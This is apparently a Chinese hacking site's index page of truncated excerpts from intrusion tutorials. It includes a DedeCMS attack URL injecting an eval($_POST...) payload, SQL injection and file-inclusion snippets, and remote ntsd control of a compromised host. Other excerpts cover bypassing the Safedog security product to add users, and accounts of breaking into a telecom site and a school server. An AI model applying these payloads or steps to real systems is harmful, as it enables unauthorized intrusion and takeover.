入侵防御

假设域名是：www.abc.com 攻击步骤如下： 1. 访问网址： http://www.abc.com/plus/digg_frame.php?action=good&id=1024%651024&mid=*/eval($_POST...

这个是最新有人发现的 该漏洞文件：ask/search_ajax.php 漏洞说明： /ask/search_ajax.php Code: if($q) { $where = " title LIKE \’%$q%\’...

在我的《为什么使用Google扫描安全漏洞》的技巧中，我讨论了如何使用Google.com来执行对你的面向公众的服务器的安全扫描――包括Windows、IIS、Apache和（但愿不会如此！）SQL Server。你能使用它得到服务器的信息、包含敏感信...

电信级的系统估计都是采用比较大型的数据库了吧~ 而且涉及到高速搜索方面的！出乎我意料之外呢！兰州电信 号码百事通的网站 居然是用IIS ASP！呵呵！ASP估计脚本小子都玩得很熟悉了！-_- 而且ASP不采用FSO生成静态页面技术！ 呵呵~其实注入点并...

1.肉鸡上运行：ntsd -server tcp:port=端口 要调试的程序（可以任意，只要存在即可），例如：ntsd -server tcp:port=99 calc.exe，会新弹出个窗口，并监听刚才设置端口。 2.本机运行：ntsd -remo...

一、看见漏洞公告 　　最近想学习一下文件包含漏洞，在无意中看见了关于文件包含的漏洞公告。大致的意思是这样的，PhpwCMS 1.2.6系统的下列文件存在文件包含漏洞：include/inc_ext/spaw/dialogs/table.php 　　in...

Cacls filename [/T] [/E] [/C] [/G user:perm] [/R user […]] [/P user:perm […]] [/D user […]] 　　 Filename&mdas...

上次发了安全狗下加用户的另一方法，据说不够风骚…所以这次要淫荡一点 方法同样很简单，不过不知道有没有人发过。。PS: 转载请不要注明作者 0×01 测试环境： 安全狗的进程： .安全狗的服务 .开启远程桌面守护 .远程登录测试...

一些常用的sql注入语句。下面我将介绍如何使用手工注入MYSQL,MSSQL数据库. 一般漏洞产生的原因 : 程序执行中未对敏感字符进行过滤,使得攻击者传入恶意字符串与结构化数据查询语句合并,并且执行恶意代码. 创建text数据表MYSQL代码: 复制...

第一课　首先试试“安全模式”漏洞。 　　到网吧后开机（不要管理员解锁），一会儿屏幕出现“Starting Windows ……”时，按下"F5"键启动到&l...

————只要给我一个注射点，无论什么权限，我都给你一个webshell甚至系统权限 声明：本文仅用于教学目的，如果因为本文造成的攻击后果本人概不负责。因为 发觉其危害过大，原文已经经过大量删减及修改，即使...

前奏：无意间拿下了学校一台检测网络访问的服务器，无意间看到一个远程登录的信息，遂对此网段扫描了一下80端口。。。 上个J8，就是那个上网检测东西。。其实记录的很详细，没有加密的聊天内容都可以看到。我还是比较尊重他人隐私的，所以只查看了一些上网行为。刚才...